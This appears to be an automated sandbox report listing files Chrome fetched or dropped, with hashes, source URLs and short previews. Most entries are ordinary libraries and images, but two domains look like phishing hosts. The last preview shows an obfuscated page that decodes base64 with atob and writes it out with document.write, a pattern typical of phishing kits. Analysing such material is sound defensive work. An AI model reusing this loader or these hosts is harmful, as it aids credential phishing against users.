                                                                                                                                                Preview:L..................F.@.. ...$+.,....I...Y)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 15:47:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2679
                                                                                                                                                Entropy (8bit):3.991124742068893
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8BSdNTVFtWHyidAKZdA1duTeehOuTbbiZUk5OjqehOuTbly+yT+:8KP+TfTbxWOvTbly7T
                                                                                                                                                MD5:5C5522B7E132B9EAA9419A21D38C16F9
                                                                                                                                                SHA1:AF77AF0D9CD47EB5F34387E185B6142558243082
                                                                                                                                                SHA-256:CC2BB6089B3BAA3273E3806A0CA24B58ADE8A60E09BEC30C02E1CE2FDD2DA532
                                                                                                                                                SHA-512:A237D53E82134E12243556AD95C022A881D1F1E12792831AA2BABBA32DF4BA1E988278DBB77C7186ED65FEAAE572D47BD852B8E4AAC9F487FD2B94EED5A4CFD7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:L..................F.@.. ...$+.,....Y...Y)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):48316
                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (2759), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7678
                                                                                                                                                Entropy (8bit):5.582789403702321
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ypbr5LABXRfuIVujSRWOwxSxgbZYTS47ykyzyAyiA1yiyzpHQ:yBtLMXR2LjhOWVYTS4YAKpw
                                                                                                                                                MD5:6CAEF6A1769CF82CC14E83318C13F719
                                                                                                                                                SHA1:60BE4705A8424B82C4C76ACA81CCBFBE24D29D6F
                                                                                                                                                SHA-256:71C977AD856C51772A17EF17BDD760CDA679363BC3982A82DF60382C1EB4CA22
                                                                                                                                                SHA-512:70C47B44B5C9B98F79B154D79768D652238BB12004568E0ED703419B5EE946DF8C55BE1003FCA4C7ADEF95A6169D44B9FE035B9658758914E98C7C31AB4A7B22
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<!DOCTYPE html>..<html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive">..<head>.. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="msapplication-tap-highlight" content="no">.. <meta name="referrer" content="origin-when-cross-origin">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">.. <meta name="format-detection" content="telephone=no">..<style>.. .h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (47671)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47672
                                                                                                                                                Entropy (8bit):5.4016434300784555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUen+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3Uesnpj
                                                                                                                                                MD5:EC4B20037C896C5F60640105C6EA36B1
                                                                                                                                                SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                                                                                                                                SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                                                                                                                                SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:PNG image data, 18 x 97, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):61
                                                                                                                                                Entropy (8bit):4.002585360278503
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yionv//thPlEx/WlHxl/k4E08up:6v/lhPyIlH7Tp
                                                                                                                                                MD5:72A6DD6DD103EA9C8811EFA451FD45B0
                                                                                                                                                SHA1:C8745DC25C7911ACA5BA644AB3209E7A0FDE2C6A
                                                                                                                                                SHA-256:E758857D9C6824646DA071FE3B92FF0654178378391E400B81F253C583B9D2E1
                                                                                                                                                SHA-512:32B1E6BACC23606D720E96362CC5AB866F0C7599945BC2C69C2D3744B1949E8BD6993240B8CDFCFB5F0025AD10CD32BCEC639823AB763CBE6BABB5ABF66CFC95
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d9c68ac0f68e79a/1730134061652/A1f9igYSRdqhedP
                                                                                                                                                Preview:.PNG........IHDR.......a.....T.fo....IDAT.....$.....IEND.B`.
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89501
                                                                                                                                                Entropy (8bit):5.289893677458563
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (2759), with CRLF line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):7678
                                                                                                                                                Entropy (8bit):5.582789403702321
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ypbr5LABXRfuIVujSRWOwxSxgbZYTS47ykyzyAyiA1yiyzpHQ:yBtLMXR2LjhOWVYTS4YAKpw
                                                                                                                                                MD5:6CAEF6A1769CF82CC14E83318C13F719
                                                                                                                                                SHA1:60BE4705A8424B82C4C76ACA81CCBFBE24D29D6F
                                                                                                                                                SHA-256:71C977AD856C51772A17EF17BDD760CDA679363BC3982A82DF60382C1EB4CA22
                                                                                                                                                SHA-512:70C47B44B5C9B98F79B154D79768D652238BB12004568E0ED703419B5EE946DF8C55BE1003FCA4C7ADEF95A6169D44B9FE035B9658758914E98C7C31AB4A7B22
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://vokbz-iamgold.mobile-pdfqronline.com/11384/
                                                                                                                                                Preview:<!DOCTYPE html>..<html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive">..<head>.. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="msapplication-tap-highlight" content="no">.. <meta name="referrer" content="origin-when-cross-origin">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">.. <meta name="format-detection" content="telephone=no">..<style>.. .h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:PNG image data, 84 x 99, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):61
                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yionv//thPlYnIhAkxl/k4E08up:6v/lhPGIKk7Tp
                                                                                                                                                MD5:23DE555D449BF67A344F9D9CE31E8A7B
                                                                                                                                                SHA1:CC449BCC93242468772070EA3F6B3961B07E5B9C
                                                                                                                                                SHA-256:7BED2E2BAB71C5EDDB161FA59203C8979FA9EDD57BCCBBC5BD2A7002AB790761
                                                                                                                                                SHA-512:5EE05B3F25523EE5A227F964BA653E2430B603FDFA9711A470E50D671A8D4434EE13CF90ED605A1C447C0FB0CB4BCC7C79364F199F2072A640CF9B318E1005E8
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d9c69278df22e27/1730134081331/HTYBVlYO-jFT7-s
                                                                                                                                                Preview:.PNG........IHDR...T...c......v......IDAT.....$.....IEND.B`.
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:PNG image data, 84 x 99, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):61
                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yionv//thPlYnIhAkxl/k4E08up:6v/lhPGIKk7Tp
                                                                                                                                                MD5:23DE555D449BF67A344F9D9CE31E8A7B
                                                                                                                                                SHA1:CC449BCC93242468772070EA3F6B3961B07E5B9C
                                                                                                                                                SHA-256:7BED2E2BAB71C5EDDB161FA59203C8979FA9EDD57BCCBBC5BD2A7002AB790761
                                                                                                                                                SHA-512:5EE05B3F25523EE5A227F964BA653E2430B603FDFA9711A470E50D671A8D4434EE13CF90ED605A1C447C0FB0CB4BCC7C79364F199F2072A640CF9B318E1005E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.PNG........IHDR...T...c......v......IDAT.....$.....IEND.B`.
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (47671)
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):47672
                                                                                                                                                Entropy (8bit):5.4016434300784555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUen+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3Uesnpj
                                                                                                                                                MD5:EC4B20037C896C5F60640105C6EA36B1
                                                                                                                                                SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                                                                                                                                SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                                                                                                                                SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit
                                                                                                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (47671)
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):47672
                                                                                                                                                Entropy (8bit):5.4016434300784555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUen+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3Uesnpj
                                                                                                                                                MD5:EC4B20037C896C5F60640105C6EA36B1
                                                                                                                                                SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                                                                                                                                SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                                                                                                                                SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.js
                                                                                                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):48316
                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):89501
                                                                                                                                                Entropy (8bit):5.289893677458563
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (6377), with CRLF line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):17781
                                                                                                                                                Entropy (8bit):5.91165477422511
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:NBnujvP5ZZWkUuDVDmhMyTczLXaIznujvP5ZZWkUuDVDmhMyTczLXAlrNLXrlrNS:0P5ZZjU0iRTI8P5ZZjU0iRblrllrE
                                                                                                                                                MD5:467DF945EF35550E9723950FFF27B7EE
                                                                                                                                                SHA1:ACF2CA0CACA42B03AC62BF7632BCBFCAC0C2E5E1
                                                                                                                                                SHA-256:CBF953B6CD92C4565ADE912F8B2C0272EF3FA44206334D39100C482822665383
                                                                                                                                                SHA-512:415C4320E6FDC8D87FE5B91FB79AAA1DC3E9D0046A3CADE81A4E088236621AAC8F8043A9CA5893C58B6E9006BF63132D59AB1A35328BAC0755BE09D5AAAE030A
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://8sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/
                                                                                                                                                Preview: The road to success and the road to failure are almost exactly the same. -->....<script>../* Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. */..if(atob("aHR0cHM6Ly84U3EudzJhZ24uY29tL0I5WjY0SENfb0pia3ZTbVZCYVF6ZmtpRzdZTmQtMFBvLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):61
                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                Malicious:false
                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
